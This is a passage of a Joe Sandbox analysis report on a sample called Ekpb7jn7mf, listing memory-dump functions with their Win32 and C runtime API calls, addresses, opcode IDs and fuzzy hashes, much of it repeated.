                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: Time$System$File
                                                                                  • String ID:
                                                                                  • API String ID: 2838179519-0
                                                                                  • Opcode ID: 73c0fe710d69e9a8317a733d124d89beeb6e31e8a0860a5e8cfb29a734f86780
                                                                                  • Instruction ID: 59434568b1c2b5fc6a93c3db55aab0bab5b4963efa3a3d3351e5901167eda4be
                                                                                  • Opcode Fuzzy Hash: 73c0fe710d69e9a8317a733d124d89beeb6e31e8a0860a5e8cfb29a734f86780
                                                                                  • Instruction Fuzzy Hash: 6CE0E6B690020DAFCB10DF94D84A8DEBBFCEB48210F404465DD42E3301E630E655CBD5
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: _realloc
                                                                                  • String ID:
                                                                                  • API String ID: 1750794848-0
                                                                                  • Opcode ID: 83e84a8adc4c6bcc18e54cf14a6e0ef6e2350f436e9b7f199ea47aea8a84c61c
                                                                                  • Instruction ID: ccd42938f32d8140383a85433f03869281217cc3306c596cf6886b904b25083a
                                                                                  • Opcode Fuzzy Hash: 83e84a8adc4c6bcc18e54cf14a6e0ef6e2350f436e9b7f199ea47aea8a84c61c
                                                                                  • Instruction Fuzzy Hash: 8F02E4B1A106069BCB1DDF28C5816E9B7E1FF85304F20852ED556CBA84D338F9E1CB88
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: _memset
                                                                                  • String ID:
                                                                                  • API String ID: 2102423945-0
                                                                                  • Opcode ID: 8b445e2d0af184b95e2d68b27cf31678ff647875f71702221eff0f79dd89f91d
                                                                                  • Instruction ID: 7c45f5d2537cab61057ef223a39c2d6b2a97954d4784be44a639594692d6218a
                                                                                  • Opcode Fuzzy Hash: 8b445e2d0af184b95e2d68b27cf31678ff647875f71702221eff0f79dd89f91d
                                                                                  • Instruction Fuzzy Hash: 19A1FF71A00208EBDB04DF59C591BEDB7B5EB44305F20446FE806EB282CB799F86DB59
                                                                                  APIs
                                                                                  • CoCreateInstance.OLE32(0042B188,00000000,00000001,0042B0D8,?), ref: 0041993E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateInstance
                                                                                  • String ID:
                                                                                  • API String ID: 542301482-0
                                                                                  • Opcode ID: 51240b941610a78def0c35cfdd78c70d2fdaf1beb92afbb0e55c463cad22891a
                                                                                  • Instruction ID: f6ffd578f3a69ff9c0007d043678d94b5502af227f55d6373d15ec98f62652d0
                                                                                  • Opcode Fuzzy Hash: 51240b941610a78def0c35cfdd78c70d2fdaf1beb92afbb0e55c463cad22891a
                                                                                  • Instruction Fuzzy Hash: EB31D5B5600209EFCB04CFA4C899EAA7BB9EF49345B200499F9429B350C73AED51DB64
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: _memset
                                                                                  • String ID:
                                                                                  • API String ID: 2102423945-0
                                                                                  • Opcode ID: b82101085f311d5ff6f0195a33d3c8677c672b2327c7cf6ec3dc6be87143151e
                                                                                  • Instruction ID: 501842424769ff1faba8a2f973c04ad9dbb82eae3440be5a081cbe4827cf75c2
                                                                                  • Opcode Fuzzy Hash: b82101085f311d5ff6f0195a33d3c8677c672b2327c7cf6ec3dc6be87143151e
                                                                                  • Instruction Fuzzy Hash: A521F9B2A04645DFDB24DF29D48079EBBE49B19700F108A2FE496F73C1D678E9418749
                                                                                  APIs
                                                                                  • GetVersionExW.KERNEL32(?), ref: 00409B4B
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: Version
                                                                                  • String ID:
                                                                                  • API String ID: 1889659487-0
                                                                                  • Opcode ID: 323b664bac6b029254f741a14eb1960b5593a766be610192fc34cae7ccbd568a
                                                                                  • Instruction ID: 8c5665d2b5a010ee965aa838096fee94efe835068f1214688c479bddac91fd46
                                                                                  • Opcode Fuzzy Hash: 323b664bac6b029254f741a14eb1960b5593a766be610192fc34cae7ccbd568a
                                                                                  • Instruction Fuzzy Hash: CCF01D719001188FCB28CB18ED915D5B3F1F744314F5042B5D615D33D0D6B4AE81CF69
                                                                                  APIs
                                                                                  • SetUnhandledExceptionFilter.KERNEL32(Function_0002323C), ref: 00423283
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: ExceptionFilterUnhandled
                                                                                  • String ID:
                                                                                  • API String ID: 3192549508-0
                                                                                  • Opcode ID: 83b6a97849cf72bb80c7f5c4240ce15bd4f7ba8dbfae0b27471a2bbb2cf48466
                                                                                  • Instruction ID: 72b603c122315a7ab41933ea19eb4c364bde2c87d01a378921f78c7b6b2b8dbe
                                                                                  • Opcode Fuzzy Hash: 83b6a97849cf72bb80c7f5c4240ce15bd4f7ba8dbfae0b27471a2bbb2cf48466
                                                                                  • Instruction Fuzzy Hash: FD9002603511608746101B706D0A71565A05B69613FD558A1A441C4054DA9C8165552B
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: gj
                                                                                  • API String ID: 0-4203073231
                                                                                  • Opcode ID: 657123a7913344ab9a97147e8efb5658b1a5a6e789d1f0cda9d2c80b18b5b205
                                                                                  • Instruction ID: b2a9e86ee478ddf6d853b585b2e9c1939bccb96f7846b19d9b2cdb25fada05ce
                                                                                  • Opcode Fuzzy Hash: 657123a7913344ab9a97147e8efb5658b1a5a6e789d1f0cda9d2c80b18b5b205
                                                                                  • Instruction Fuzzy Hash: 4DC106B2D002289BDF44CF9AD8805DEFBB2BFC8310F6AC1A6D81577615D6346A528F91
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: uC
                                                                                  • API String ID: 0-1504446725
                                                                                  • Opcode ID: 349de8c0ae2f05400355cc0c855bfba9fe9dff50597b8f65b6f89c9216da9d24
                                                                                  • Instruction ID: cf5882200b297374fc74bf4f0d6c4e8219ce614918710f618014b0e146572498
                                                                                  • Opcode Fuzzy Hash: 349de8c0ae2f05400355cc0c855bfba9fe9dff50597b8f65b6f89c9216da9d24
                                                                                  • Instruction Fuzzy Hash: 0051E674804299AACB12CFA4C4D05FDBFB0EF59324F6941BFD8857B282C2357646CB94
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: _memset
                                                                                  • String ID:
                                                                                  • API String ID: 2102423945-0
                                                                                  • Opcode ID: a1192addd46f0d18085a054e2bb2681faa894532e111ec1e7ff070f4dd982f64
                                                                                  • Instruction ID: 00ab746b55baef28f9d77789ef054137b2c973a5cb05ccb9dd5712b5bc67d198
                                                                                  • Opcode Fuzzy Hash: a1192addd46f0d18085a054e2bb2681faa894532e111ec1e7ff070f4dd982f64
                                                                                  • Instruction Fuzzy Hash: 9972E270A047459FCB29CF24C5D06E9BBF1AF56308F15C4AED9969B342C738E985CB18
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Similarity
                                                                                  • API ID: _wcscpy_wcslen_wcsncpy
                                                                                  • String ID: UNC$\\?\
                                                                                  • API String ID: 677062453-253988292
                                                                                  APIs
                                                                                  • _wcslen.LIBCMT ref: 00419514
                                                                                  • _malloc.LIBCMT ref: 00419521
                                                                                    • Part of subcall function 0041CCEE: __FF_MSGBANNER.LIBCMT ref: 0041CD11
                                                                                    • Part of subcall function 0041CCEE: __NMSG_WRITE.LIBCMT ref: 0041CD18
                                                                                    • Part of subcall function 0041CCEE: RtlAllocateHeap.NTDLL(00000000,-0000000F,00000001,00000000,00000000,?,004210A4,00000000,00000001,00000000,?,0041ECDD,00000018,0042D8B8,0000000C,0041ED6E), ref: 0041CD65
                                                                                  • _wcscpy.LIBCMT ref: 0041953A
                                                                                  • _wcscat.LIBCMT ref: 00419545
                                                                                  • _wcscat.LIBCMT ref: 00419550
                                                                                  • _wcscat.LIBCMT ref: 0041958B
                                                                                  • _wcscat.LIBCMT ref: 0041959C
                                                                                  • _wcslen.LIBCMT ref: 004195B5
                                                                                  • GlobalAlloc.KERNEL32(00000040,-00000009,?,<html>,00000006), ref: 004195C6
                                                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,-00000106,00000000,00000000), ref: 004195E7
                                                                                  • CreateStreamOnHGlobal.OLE32(00000000,00000001,00000000), ref: 0041960F
                                                                                  Similarity
                                                                                  • API ID: _wcscat$Global_wcslen$AllocAllocateByteCharCreateHeapMultiStreamWide_malloc_wcscpy
                                                                                  • String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
                                                                                  • API String ID: 4158105118-4209811716
                                                                                  • Opcode ID: 094548c340a6c7a3b8b77f4710af8c0ccba77d5e9c3a63f69f96a657ba005cf9
                                                                                  • Instruction ID: 11fdc154705fa1265123fb9ff1eccb2a049f9cc5486916b8e4ddd2d18f464033
                                                                                  • Opcode Fuzzy Hash: 094548c340a6c7a3b8b77f4710af8c0ccba77d5e9c3a63f69f96a657ba005cf9
                                                                                  • Instruction Fuzzy Hash: 4F314B32905200BBCB21AB619C81EEF37799F41324F14409FF815AB2C2DB3D9E91876D
                                                                                  APIs
                                                                                  • ShowWindow.USER32(?,00000000,00000000,?,?), ref: 0041982C
                                                                                    • Part of subcall function 004197AB: LoadCursorW.USER32(00000000,00007F00), ref: 004197E2
                                                                                    • Part of subcall function 004197AB: RegisterClassExW.USER32(00000030), ref: 00419803
                                                                                  • GetWindowRect.USER32(?,?), ref: 0041984D
                                                                                  • GetParent.USER32(?), ref: 00419860
                                                                                  • MapWindowPoints.USER32(00000000,00000000), ref: 00419865
                                                                                  • DestroyWindow.USER32(?), ref: 00419873
                                                                                  • GetParent.USER32(?), ref: 00419891
                                                                                  • CreateWindowExW.USER32(00000000,RarHtmlClassName,00000000,40000000,?,?,?,?,00000000), ref: 004198B0
                                                                                  • ShowWindow.USER32(?,00000005,?), ref: 004198E2
                                                                                  • SetWindowTextW.USER32(?,00000000), ref: 004198EC
                                                                                  • ShowWindow.USER32(00000000,00000005), ref: 00419902
                                                                                  • UpdateWindow.USER32(?), ref: 0041990B
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$Show$Parent$ClassCreateCursorDestroyLoadPointsRectRegisterTextUpdate
                                                                                  • String ID: RarHtmlClassName
                                                                                  • API String ID: 3841971108-1658105358
                                                                                  • Opcode ID: d7e2d38c53ea50d8d6f2b087bcee56e4380f1a53bbbe24c4848b2102da79a821
                                                                                  • Instruction ID: 18a454af694ecf558c9de2c3b9fe70b0a29876972dccec8d3d2db288ca25061c
                                                                                  • Opcode Fuzzy Hash: d7e2d38c53ea50d8d6f2b087bcee56e4380f1a53bbbe24c4848b2102da79a821
                                                                                  • Instruction Fuzzy Hash: 4A319A71600604EFCB319FA4CC48AAFBBB9FF48710F10452AF85692361D735AD91CBA9
                                                                                  APIs
                                                                                  • _wcscpy.LIBCMT ref: 0040517A
                                                                                  • _wcslen.LIBCMT ref: 00405182
                                                                                  • _wcscpy.LIBCMT ref: 00405192
                                                                                  • _wcslen.LIBCMT ref: 00405198
                                                                                  • _wcscpy.LIBCMT ref: 004051B0
                                                                                  • _wcslen.LIBCMT ref: 004051B6
                                                                                  • _wcscpy.LIBCMT ref: 004051C5
                                                                                  • _wcslen.LIBCMT ref: 004051CB
                                                                                  • _memset.LIBCMT ref: 004051E0
                                                                                  • GetSaveFileNameW.COMDLG32(?,?,?,?,?,?,000000A2), ref: 0040522C
                                                                                  • GetOpenFileNameW.COMDLG32(?,?,?,?,?,?,000000A2), ref: 00405234
                                                                                  • CommDlgExtendedError.COMDLG32(?,?,?,?,?,000000A2), ref: 0040523C
                                                                                  • GetSaveFileNameW.COMDLG32(?,?,?,?,?,?,000000A2), ref: 00405258
                                                                                  • GetOpenFileNameW.COMDLG32(?,?,?,?,?,?,000000A2), ref: 00405260
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileName_wcscpy_wcslen$OpenSave$CommErrorExtended_memset
                                                                                  • String ID:
                                                                                  • API String ID: 3496903968-0
                                                                                  • Opcode ID: a5faa8c4c69004b7bb5267c6c72b3ff1a4d2df59c7eb0ab7550321787e94547b
                                                                                  • Instruction ID: 55bf67cc7318731f0be5ec7d78ee7543e3385b57d9dccdff966e71b7230244cc
                                                                                  • Opcode Fuzzy Hash: a5faa8c4c69004b7bb5267c6c72b3ff1a4d2df59c7eb0ab7550321787e94547b
                                                                                  • Instruction Fuzzy Hash: AD31A871905614ABCF11EFA5DC49ACF7BB8EF04354F10042BF905B7241DB3899958FAA
                                                                                  APIs
                                                                                  • GetDC.USER32(00000000), ref: 00419A8C
                                                                                  • CreateCompatibleDC.GDI32(00000000), ref: 00419A9C
                                                                                  • CreateCompatibleDC.GDI32(?), ref: 00419AA3
                                                                                  • GetObjectW.GDI32(?,00000018,?), ref: 00419AB1
                                                                                  • CreateCompatibleBitmap.GDI32(?,00000200,00419C32), ref: 00419AD3
                                                                                  • SelectObject.GDI32(00000000,?), ref: 00419AE6
                                                                                  • SelectObject.GDI32(?,00000200), ref: 00419AF1
                                                                                  • StretchBlt.GDI32(?,00000000,00000000,00000200,00419C32,00000000,00000000,00000000,?,?,00CC0020), ref: 00419B0F
                                                                                  • SelectObject.GDI32(00000000,?), ref: 00419B19
                                                                                  • SelectObject.GDI32(?,00419C32), ref: 00419B21
                                                                                  • DeleteDC.GDI32(00000000), ref: 00419B2A
                                                                                  • DeleteDC.GDI32(?), ref: 00419B2F
                                                                                  • ReleaseDC.USER32(00000000,?), ref: 00419B35
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: Object$Select$CompatibleCreate$Delete$BitmapReleaseStretch
                                                                                  • String ID:
                                                                                  • API String ID: 3950507155-0
                                                                                  • Opcode ID: 645663dba6679b36ad936e8b2df9ede2b2f8713d484d9860903d99ab566a2af6
                                                                                  • Instruction ID: 119e2cb59528a0c7d7cd872958e0e9ee33bbab5a20e852a649a5765f6f8a0c9b
                                                                                  • Opcode Fuzzy Hash: 645663dba6679b36ad936e8b2df9ede2b2f8713d484d9860903d99ab566a2af6
                                                                                  • Instruction Fuzzy Hash: 7D21A376900258FFCF129FA1CC48DEEBFB9FB49350B104466F914A2120C7369A65EFA4
                                                                                  APIs
                                                                                  • GetModuleHandleW.KERNEL32(KERNEL32.DLL,0042D828,0000000C,0041E73F,00000000,00000000,?,0041FC28,0041A72A,00000456,?,?,0041A72A,00000000,?), ref: 0041E616
                                                                                  • __crt_waiting_on_module_handle.LIBCMT ref: 0041E621
                                                                                    • Part of subcall function 00421215: Sleep.KERNEL32(000003E8,00000000,?,0041E567,KERNEL32.DLL,?,0041E5B3,?,0041FC28,0041A72A,00000456,?,?,0041A72A,00000000,?), ref: 00421221
                                                                                    • Part of subcall function 00421215: GetModuleHandleW.KERNEL32(00000000,?,0041E567,KERNEL32.DLL,?,0041E5B3,?,0041FC28,0041A72A,00000456,?,?,0041A72A,00000000,?), ref: 0042122A
                                                                                  • GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 0041E64A
                                                                                  • GetProcAddress.KERNEL32(0041A72A,DecodePointer), ref: 0041E65A
                                                                                  • __lock.LIBCMT ref: 0041E67C
                                                                                  • InterlockedIncrement.KERNEL32(?), ref: 0041E689
                                                                                  • __lock.LIBCMT ref: 0041E69D
                                                                                  • ___addlocaleref.LIBCMT ref: 0041E6BB
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressHandleModuleProc__lock$IncrementInterlockedSleep___addlocaleref__crt_waiting_on_module_handle
                                                                                  • String ID: DecodePointer$EncodePointer$KERNEL32.DLL
                                                                                  • API String ID: 1028249917-2843748187
                                                                                  • Opcode ID: 9635beca641f941a5cf41b771aad4b1ee68b70dcc45c0ba52da07d90b48f8134
                                                                                  • Instruction ID: 4acc287862233ff18776b049d6808c76d8f0a9d559ad4d14c80fa06a5396db16
                                                                                  • Opcode Fuzzy Hash: 9635beca641f941a5cf41b771aad4b1ee68b70dcc45c0ba52da07d90b48f8134
                                                                                  • Instruction Fuzzy Hash: 6611C671A00701DFD720AF269805B9AB7F0AF14314FD0456FE8A9972A0CB7895418F5D
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmp
